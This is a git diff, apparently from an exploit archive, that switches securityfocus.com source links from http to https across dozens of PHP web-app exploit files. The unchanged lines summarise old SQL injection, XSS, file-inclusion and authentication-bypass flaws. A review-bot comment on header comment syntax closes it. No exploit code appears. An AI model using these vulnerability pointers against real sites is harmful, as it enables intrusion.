a/exploits/php/webapps/24991.txt +++ b/exploits/php/webapps/24991.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24992.txt b/exploits/php/webapps/24992.txt index 32e69b9b2..71b5e5f35 100644 --- a/exploits/php/webapps/24992.txt +++ b/exploits/php/webapps/24992.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24993.txt b/exploits/php/webapps/24993.txt index 01fdb6231..7741b5e8f 100644 --- a/exploits/php/webapps/24993.txt +++ b/exploits/php/webapps/24993.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11984/info +source: https://www.securityfocus.com/bid/11984/info Wordpress is reported vulnerable to multiple cross-site scripting, HTML injection, and SQL injection vulnerabilities. These issues are due to a lack of proper sanitization of user-supplied data. diff --git a/exploits/php/webapps/24994.txt b/exploits/php/webapps/24994.txt index 9eeeab59c..571845b41 100644 --- a/exploits/php/webapps/24994.txt +++ b/exploits/php/webapps/24994.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/11985/info +source: https://www.securityfocus.com/bid/11985/info MediaWiki is reported prone to a vulnerability that can allow a remote attacker to upload arbitrary PHP scripts to a vulnerable server. This issue results from insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/25014.txt b/exploits/php/webapps/25014.txt index 3a8fd8588..6a6d0f59c 100644 --- a/exploits/php/webapps/25014.txt +++ b/exploits/php/webapps/25014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12009/info +source: https://www.securityfocus.com/bid/12009/info It is reported that WorkBoard is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25037.txt b/exploits/php/webapps/25037.txt index 6680e9d4a..b8fd7309b 100644 --- a/exploits/php/webapps/25037.txt 
+++ b/exploits/php/webapps/25037.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12037/info +source: https://www.securityfocus.com/bid/12037/info Kayako eSupport is prone to multiple input validation vulnerabilities. One cross-site scripting and six SQL injection vulnerabilities. diff --git a/exploits/php/webapps/25038.txt b/exploits/php/webapps/25038.txt index 895b9ba0c..350a99c3b 100644 --- a/exploits/php/webapps/25038.txt +++ b/exploits/php/webapps/25038.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12037/info +source: https://www.securityfocus.com/bid/12037/info Kayako eSupport is prone to multiple input validation vulnerabilities. One cross-site scripting and six SQL injection vulnerabilities. diff --git a/exploits/php/webapps/25043.txt b/exploits/php/webapps/25043.txt index cd4bb5814..9fbef4610 100644 --- a/exploits/php/webapps/25043.txt +++ b/exploits/php/webapps/25043.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12074/info +source: https://www.securityfocus.com/bid/12074/info phpGroupWare is prone to a remote file include vulnerability, potentially allowing the execution of malicious PHP code. This would occur in the context of the affected web server. diff --git a/exploits/php/webapps/25044.txt b/exploits/php/webapps/25044.txt index cca49c560..2935e44be 100644 --- a/exploits/php/webapps/25044.txt +++ b/exploits/php/webapps/25044.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12082/info +source: https://www.securityfocus.com/bid/12082/info PhpGroupWare is reported to be susceptible to a HTML injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25045.txt b/exploits/php/webapps/25045.txt index 248eca71a..6bb169193 100644 --- a/exploits/php/webapps/25045.txt +++ b/exploits/php/webapps/25045.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12083/info +source: https://www.securityfocus.com/bid/12083/info A remote SQL injection vulnerability reportedly affects 2Bgal. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in an SQL query. diff --git a/exploits/php/webapps/25052.pl b/exploits/php/webapps/25052.pl index a7ea6aca3..cc37ea367 100755 --- a/exploits/php/webapps/25052.pl +++ b/exploits/php/webapps/25052.pl @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12304/info +source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/25053.html b/exploits/php/webapps/25053.html index a75a06e8e..9154a2bd4 100644 --- a/exploits/php/webapps/25053.html +++ b/exploits/php/webapps/25053.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12304/info +source: https://www.securityfocus.com/bid/12304/info Siteman is reported prone to a vulnerability that may allow users to gain elevated privileges. This issue results from insufficient sanitization of user-supplied data. diff --git a/exploits/php/webapps/25058.txt b/exploits/php/webapps/25058.txt index 36eec0c58..469a1e1b4 100644 --- a/exploits/php/webapps/25058.txt +++ b/exploits/php/webapps/25058.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12358/info +source: https://www.securityfocus.com/bid/12358/info Exponent is reported prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/php/webapps/25059.txt b/exploits/php/webapps/25059.txt index cd9567e8a..55c8d9762 100644 --- a/exploits/php/webapps/25059.txt +++ b/exploits/php/webapps/25059.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12359/info +source: https://www.securityfocus.com/bid/12359/info Multiple input validation vulnerabilities affect MercuryBoard. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in critical functionality. diff --git a/exploits/php/webapps/25062.txt b/exploits/php/webapps/25062.txt index b741507d0..922ca18b9 100644 --- a/exploits/php/webapps/25062.txt +++ b/exploits/php/webapps/25062.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12382/info +source: https://www.securityfocus.com/bid/12382/info Comdev eCommerce is reported prone to multiple cross-site scripting vulnerabilities. These may facilitate theft of cookie-based authentication credentials as well as other attacks. diff --git a/exploits/php/webapps/25064.txt b/exploits/php/webapps/25064.txt index 926a3ebd7..bb30878fa 100644 --- a/exploits/php/webapps/25064.txt +++ b/exploits/php/webapps/25064.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12388/info +source: https://www.securityfocus.com/bid/12388/info Magic Winmail Server is reportedly affected by multiple vulnerabilities. diff --git a/exploits/php/webapps/25065.txt b/exploits/php/webapps/25065.txt index 8d6fc237f..10dc98491 100644 --- a/exploits/php/webapps/25065.txt +++ b/exploits/php/webapps/25065.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12388/info +source: https://www.securityfocus.com/bid/12388/info Magic Winmail Server is reportedly affected by multiple vulnerabilities. diff --git a/exploits/php/webapps/25068.txt b/exploits/php/webapps/25068.txt index 33a828970..233d3b4bb 100644 --- a/exploits/php/webapps/25068.txt +++ b/exploits/php/webapps/25068.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12396/info +source: https://www.securityfocus.com/bid/12396/info Multiple remote vulnerabilities reportedly affect IceWarp Web Mail. The underlying issues are due to input and access validation errors. diff --git a/exploits/php/webapps/25069.txt b/exploits/php/webapps/25069.txt index 61412455d..cac40feac 100644 --- a/exploits/php/webapps/25069.txt +++ b/exploits/php/webapps/25069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12396/info +source: https://www.securityfocus.com/bid/12396/info Multiple remote vulnerabilities reportedly affect IceWarp Web Mail. The underlying issues are due to input and access validation errors. diff --git a/exploits/php/webapps/25071.txt b/exploits/php/webapps/25071.txt index 126afc63b..5174fd3f2 100644 --- a/exploits/php/webapps/25071.txt +++ b/exploits/php/webapps/25071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12399/info +source: https://www.securityfocus.com/bid/12399/info Infinite Mobile Delivery Webmail is reportedly affected by a path disclosure vulnerability. This issue could permit a malicious user to expose the root path of the affected application. diff --git a/exploits/php/webapps/25074.txt b/exploits/php/webapps/25074.txt index aea6960b9..4dc4cccf1 100644 --- a/exploits/php/webapps/25074.txt +++ b/exploits/php/webapps/25074.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12406/info +source: https://www.securityfocus.com/bid/12406/info Xoops Incontent module is reported prone to a directory traversal vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25089.txt b/exploits/php/webapps/25089.txt index 0df94baf6..edb70d20f 100644 --- a/exploits/php/webapps/25089.txt +++ b/exploits/php/webapps/25089.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12482/info +source: https://www.securityfocus.com/bid/12482/info PHP-Fusion is reportedly affected by an information disclosure vulnerability. This issue is due to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25090.txt b/exploits/php/webapps/25090.txt index 7de492192..6356d152e 100644 --- a/exploits/php/webapps/25090.txt +++ b/exploits/php/webapps/25090.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12489/info +source: https://www.securityfocus.com/bid/12489/info xGB is reportedly affected by a vulnerability that could permit unauthorized administrator access. This issue is due to the application failing to properly verify user credentials. diff --git a/exploits/php/webapps/25093.txt b/exploits/php/webapps/25093.txt index 7cc463921..6e35e4da0 100644 --- a/exploits/php/webapps/25093.txt +++ b/exploits/php/webapps/25093.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12503/info +source: https://www.securityfocus.com/bid/12503/info MercuryBoard is affected by an SQL injection vulnerability. This issue is due to the application failing to properly sanitize user-supplied input before being used in SQL queries. diff --git a/exploits/php/webapps/25097.txt b/exploits/php/webapps/25097.txt index 3cdba76a1..b6b5ee27f 100644 --- a/exploits/php/webapps/25097.txt +++ b/exploits/php/webapps/25097.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12549/info +source: https://www.securityfocus.com/bid/12549/info Brooky CubeCart is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow remote attackers to disclose arbitrary files and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/25098.txt b/exploits/php/webapps/25098.txt index a4494eda4..87f3f24d0 100644 --- a/exploits/php/webapps/25098.txt +++ b/exploits/php/webapps/25098.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12549/info +source: https://www.securityfocus.com/bid/12549/info Brooky CubeCart is reported prone to multiple vulnerabilities. These issues result from insufficient sanitization of user-supplied data and may allow remote attackers to disclose arbitrary files and carry out cross-site scripting attacks. diff --git a/exploits/php/webapps/25099.txt b/exploits/php/webapps/25099.txt index 60e4dbfd9..1e38818f9 100644 --- a/exploits/php/webapps/25099.txt +++ b/exploits/php/webapps/25099.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12557/info +source: https://www.securityfocus.com/bid/12557/info CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import. diff --git a/exploits/php/webapps/25100.txt b/exploits/php/webapps/25100.txt index 2664460b5..a369b39f5 100644 --- a/exploits/php/webapps/25100.txt +++ b/exploits/php/webapps/25100.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12557/info +source: https://www.securityfocus.com/bid/12557/info CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import. diff --git a/exploits/php/webapps/25101.txt b/exploits/php/webapps/25101.txt index 4455a636d..baab34b12 100644 --- a/exploits/php/webapps/25101.txt +++ b/exploits/php/webapps/25101.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12557/info +source: https://www.securityfocus.com/bid/12557/info CitrusDB is reportedly affected by an access validation vulnerability during the upload of CSV files. Exploitation of this issue could result in path disclosure or SQL injection. The issue exists because the application fails to verify user credentials during file upload and import. diff --git a/exploits/php/webapps/25102.txt b/exploits/php/webapps/25102.txt index eec0348b6..63815f86f 100644 --- a/exploits/php/webapps/25102.txt +++ b/exploits/php/webapps/25102.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12560/info +source: https://www.securityfocus.com/bid/12560/info CitrusDB is reportedly affected by an authentication bypass vulnerability. This issue is due to the application using a static value during the creation of user cookie information. diff --git a/exploits/php/webapps/25103.txt b/exploits/php/webapps/25103.txt index 2461c151c..ae6b42f72 100644 --- a/exploits/php/webapps/25103.txt +++ b/exploits/php/webapps/25103.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12561/info +source: https://www.securityfocus.com/bid/12561/info It is reported that PHP-Nuke is affected by various cross-site scripting vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied URI input. diff --git a/exploits/php/webapps/25104.txt b/exploits/php/webapps/25104.txt index 054e2c3ec..fedc6c88f 100644 --- a/exploits/php/webapps/25104.txt +++ b/exploits/php/webapps/25104.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12564/info +source: https://www.securityfocus.com/bid/12564/info CitrusDB is reportedly affected by a vulnerability that permits the inclusion of any local PHP file. This issue is due to the application failing to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25105.txt b/exploits/php/webapps/25105.txt index 08f77c027..bdd605914 100644 
--- a/exploits/php/webapps/25105.txt +++ b/exploits/php/webapps/25105.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12568/info +source: https://www.securityfocus.com/bid/12568/info A vulnerability is reported to exist in osCommerce that may allow a remote user to launch cross-site scripting attacks. diff --git a/exploits/php/webapps/25109.txt b/exploits/php/webapps/25109.txt index 788817a71..daeec579d 100644 --- a/exploits/php/webapps/25109.txt +++ b/exploits/php/webapps/25109.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12573/info +source: https://www.securityfocus.com/bid/12573/info DCP-Portal is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25111.txt b/exploits/php/webapps/25111.txt index 587c52092..18f5105d5 100644 --- a/exploits/php/webapps/25111.txt +++ b/exploits/php/webapps/25111.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12576/info +source: https://www.securityfocus.com/bid/12576/info PaNews is reportedly affected by a cross-site scripting vulnerability. This issue exists because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25112.txt b/exploits/php/webapps/25112.txt index c803e63ce..277123cbc 100644 --- a/exploits/php/webapps/25112.txt +++ b/exploits/php/webapps/25112.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12578/info +source: https://www.securityfocus.com/bid/12578/info A remote cross-site scripting vulnerability affects the 'forum.php' script of MercuryBoard. This issue is due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25113.txt b/exploits/php/webapps/25113.txt index 3a6ec7f73..e1f0ef545 100644 --- a/exploits/php/webapps/25113.txt 
+++ b/exploits/php/webapps/25113.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12581/info +source: https://www.securityfocus.com/bid/12581/info WebCalendar is affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25114.txt b/exploits/php/webapps/25114.txt index 7e842168c..2a3eb8be3 100644 --- a/exploits/php/webapps/25114.txt +++ b/exploits/php/webapps/25114.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25115.txt b/exploits/php/webapps/25115.txt index 9bdc0b06c..8c34c9590 100644 --- a/exploits/php/webapps/25115.txt +++ b/exploits/php/webapps/25115.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25116.txt b/exploits/php/webapps/25116.txt index f9ef0b0c5..ae18f779b 100644 --- a/exploits/php/webapps/25116.txt +++ b/exploits/php/webapps/25116.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25117.txt b/exploits/php/webapps/25117.txt index eba48329d..749b11609 100644 --- a/exploits/php/webapps/25117.txt 
+++ b/exploits/php/webapps/25117.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12582/info +source: https://www.securityfocus.com/bid/12582/info paFaq is reportedly affected by an SQL injection vulnerability. This issue exists because the application fails to properly sanitize user-supplied input before using it in SQL queries. diff --git a/exploits/php/webapps/25118.txt b/exploits/php/webapps/25118.txt index c2bb5517b..0e8ab9522 100644 --- a/exploits/php/webapps/25118.txt +++ b/exploits/php/webapps/25118.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25119.txt b/exploits/php/webapps/25119.txt index d5f8e4385..672159089 100644 --- a/exploits/php/webapps/25119.txt +++ b/exploits/php/webapps/25119.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25120.txt b/exploits/php/webapps/25120.txt index 2941d7d4e..0f362fbed 100644 --- a/exploits/php/webapps/25120.txt +++ b/exploits/php/webapps/25120.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25121.txt b/exploits/php/webapps/25121.txt index e5ba75849..0ec01f14e 100644 --- a/exploits/php/webapps/25121.txt +++ b/exploits/php/webapps/25121.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12583/info +source: https://www.securityfocus.com/bid/12583/info BibORB is reported prone to multiple vulnerabilities arising from insufficient sanitization of user-supplied input. These issues can be exploited by a remote attacker to carry out cross-site scripting, HTML injection, SQL injection, directory traversal, and arbitrary file upload attacks. diff --git a/exploits/php/webapps/25123.txt b/exploits/php/webapps/25123.txt index 3a0c32f3c..f9f021e81 100644 --- a/exploits/php/webapps/25123.txt +++ b/exploits/php/webapps/25123.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12592/info +source: https://www.securityfocus.com/bid/12592/info TrackerCam is prone to multiple remote vulnerabilities, including buffer-overflow issues, a directory-traversal issue, an information-disclosure issue, an HTML-injection issue, and denial-of-service issues. diff --git a/exploits/php/webapps/25125.txt b/exploits/php/webapps/25125.txt index 297bd7d25..26382b5f3 100644 --- a/exploits/php/webapps/25125.txt +++ b/exploits/php/webapps/25125.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12596/info +source: https://www.securityfocus.com/bid/12596/info ZeroBoard is reported prone to multiple cross-site scripting vulnerabilities. 
diff --git a/exploits/php/webapps/25127.txt b/exploits/php/webapps/25127.txt index 130b55d4a..464a24b5f 100644 --- a/exploits/php/webapps/25127.txt +++ b/exploits/php/webapps/25127.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12597/info +source: https://www.securityfocus.com/bid/12597/info PMachine Pro is reported prone to a remote file include vulnerability. diff --git a/exploits/php/webapps/25143.txt b/exploits/php/webapps/25143.txt index 899d0f473..5b1483d2a 100644 --- a/exploits/php/webapps/25143.txt +++ b/exploits/php/webapps/25143.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12607/info +source: https://www.securityfocus.com/bid/12607/info Invision Power Board is reported prone to a JavaScript injection vulnerability. It is reported that the SML Code 'COLOR' tag is not sufficiently sanitized of malicious script content. diff --git a/exploits/php/webapps/25145.txt b/exploits/php/webapps/25145.txt index 28fc7dc56..e5dae63ed 100644 --- a/exploits/php/webapps/25145.txt +++ b/exploits/php/webapps/25145.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12611/info +source: https://www.securityfocus.com/bid/12611/info PaNews is reported prone to a remote PHP script code execution vulnerability. It is reported that PHP script code may be injected into the PaNews software through the 'showcopy' parameter of the 'admin_setup.php' script. diff --git a/exploits/php/webapps/25149.txt b/exploits/php/webapps/25149.txt index a13cd9630..fe249781d 100644 --- a/exploits/php/webapps/25149.txt +++ b/exploits/php/webapps/25149.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12627/info +source: https://www.securityfocus.com/bid/12627/info iGeneric iG Shop is reportedly affected by multiple SQL injection vulnerabilities. These issues exist because the application fails to properly sanitize user-supplied input before using them in SQL queries. 
diff --git a/exploits/php/webapps/25151.txt b/exploits/php/webapps/25151.txt index e62c4ad66..7a37a150e 100644 --- a/exploits/php/webapps/25151.txt +++ b/exploits/php/webapps/25151.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12631/info +source: https://www.securityfocus.com/bid/12631/info PBLang is reportedly affected by a cross-site scripting vulnerability. This issue exists because the application fails to properly sanitize user-supplied input. diff --git a/exploits/php/webapps/25152.txt b/exploits/php/webapps/25152.txt index c881d5cc6..f8a5229d5 100644 --- a/exploits/php/webapps/25152.txt +++ b/exploits/php/webapps/25152.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25153.txt b/exploits/php/webapps/25153.txt index 33a4d8b13..ad867853e 100644 --- a/exploits/php/webapps/25153.txt +++ b/exploits/php/webapps/25153.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25154.txt b/exploits/php/webapps/25154.txt index 4cc90cea5..e5cbdb350 100644 --- a/exploits/php/webapps/25154.txt +++ b/exploits/php/webapps/25154.txt 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25155.txt b/exploits/php/webapps/25155.txt index b6834b7c5..609547ede 100644 --- a/exploits/php/webapps/25155.txt +++ b/exploits/php/webapps/25155.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12644/info +source: https://www.securityfocus.com/bid/12644/info Multiple remote cross-site scripting vulnerabilities affect phpMyAdmin. These issues are due to a failure of the application to properly sanitize user-supplied input prior to including it in dynamically generated Web content. diff --git a/exploits/php/webapps/25156.txt b/exploits/php/webapps/25156.txt index 5eb3ac19d..4ce190a7a 100644 --- a/exploits/php/webapps/25156.txt +++ b/exploits/php/webapps/25156.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12645/info +source: https://www.securityfocus.com/bid/12645/info phpMyAdmin is affected by multiple local file include vulnerabilities. These issues are due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include()', 'require()', 'require-once()', or similar function call. diff --git a/exploits/php/webapps/25158.txt b/exploits/php/webapps/25158.txt index 800dc7921..04f453e4b 100644 --- a/exploits/php/webapps/25158.txt +++ b/exploits/php/webapps/25158.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12647/info +source: https://www.securityfocus.com/bid/12647/info OOApp Guestbook is reportedly affected by multiple HTML injection vulnerabilities. These issues occur because the application fails to properly sanitize user-supplied input. 
diff --git a/exploits/php/webapps/25160.txt b/exploits/php/webapps/25160.txt index 13a4538f4..8b1dba5b6 100644 --- a/exploits/php/webapps/25160.txt +++ b/exploits/php/webapps/25160.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12652/info +source: https://www.securityfocus.com/bid/12652/info Multiple remote input validation vulnerabilities affect PunBB. These issues are due to a failure of the application to sanitize user-supplied input prior to using it to carry out critical functions. diff --git a/exploits/php/webapps/25161.txt b/exploits/php/webapps/25161.txt index 1ec688d4e..c14c652ad 100644 --- a/exploits/php/webapps/25161.txt +++ b/exploits/php/webapps/25161.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12653/info +source: https://www.securityfocus.com/bid/12653/info phpWebSite is reported prone to a remote arbitrary PHP file upload vulnerability. The issue presents itself due to a lack of sanitization performed on image files that are uploaded when submitting an announcement. diff --git a/exploits/php/webapps/25162.txt b/exploits/php/webapps/25162.txt index c48ebe315..a15db8b70 100644 --- a/exploits/php/webapps/25162.txt +++ b/exploits/php/webapps/25162.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12658/info +source: https://www.securityfocus.com/bid/12658/info CubeCart is affected by multiple cross-site scripting vulnerabilities; an upgrade is available. diff --git a/exploits/php/webapps/25168.c b/exploits/php/webapps/25168.c index 8d0d2f88c..557dde3c9 100644 --- a/exploits/php/webapps/25168.c +++ b/exploits/php/webapps/25168.c @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12678/info +// source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. diff --git a/exploits/php/webapps/25169.pl b/exploits/php/webapps/25169.pl index 6c1d06654..03c5079c3 100755 --- a/exploits/php/webapps/25169.pl +++ b/exploits/php/webapps/25169.pl 
@@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12678/info +source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. diff --git a/exploits/php/webapps/25170.cpp b/exploits/php/webapps/25170.cpp index 592d92a7c..97d52d896 100644 --- a/exploits/php/webapps/25170.cpp +++ b/exploits/php/webapps/25170.cpp @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12678/info +source: https://www.securityfocus.com/bid/12678/info phpBB is affected by an authentication bypass vulnerability. diff --git a/exploits/php/webapps/25172.txt b/exploits/php/webapps/25172.txt index 63f408bae..45bca4e70 100644 --- a/exploits/php/webapps/25172.txt +++ b/exploits/php/webapps/25172.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12683/info +source: https://www.securityfocus.com/bid/12683/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/25173.txt b/exploits/php/webapps/25173.txt index ed365b4ab..ae06f45a0 100644 --- a/exploits/php/webapps/25173.txt +++ b/exploits/php/webapps/25173.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12684/info +source: https://www.securityfocus.com/bid/12684/info PostNuke Phoenix is reported prone to an SQL injection vulnerability. This issue arises due to insufficient sanitization of user-supplied input. diff --git a/exploits/php/webapps/25174.txt b/exploits/php/webapps/25174.txt index 460fc56d7..11cfd08d5 100644 --- a/exploits/php/webapps/25174.txt +++ b/exploits/php/webapps/25174.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/12686/info +source: https://www.securityfocus.com/bid/12686/info Multiple remote input-validation vulnerabilities affect phpCOIN because the application fails to properly sanitize user-supplied input before using it to carry out critical functionality. 
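Review bot: the header handling is inconsistent across the three phpBB files for bid/12678. In 25168.c the new line is written as a comment (`+// source: https://www.securityfocus.com/bid/12678/info`), while the 25169.pl and 25170.cpp hunks keep a bare `+source: https://www.securityfocus.com/bid/12678/info`. The `//` in 25168.c also covers only the URL line: the context line that follows it ("phpBB is affected by an authentication bypass vulnerability.") is shown unprefixed, so the header in that file is still partly plain text. Either leave 25168.c as a plain URL swap like the others, or comment out the whole header in each source file using that language's comment syntax, which would then also apply to the other script-type files touched in this patch (25052.pl, 25053.html, 25180.py). A sentence in the commit message saying which convention is intended would make the one-off `//` reviewable.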
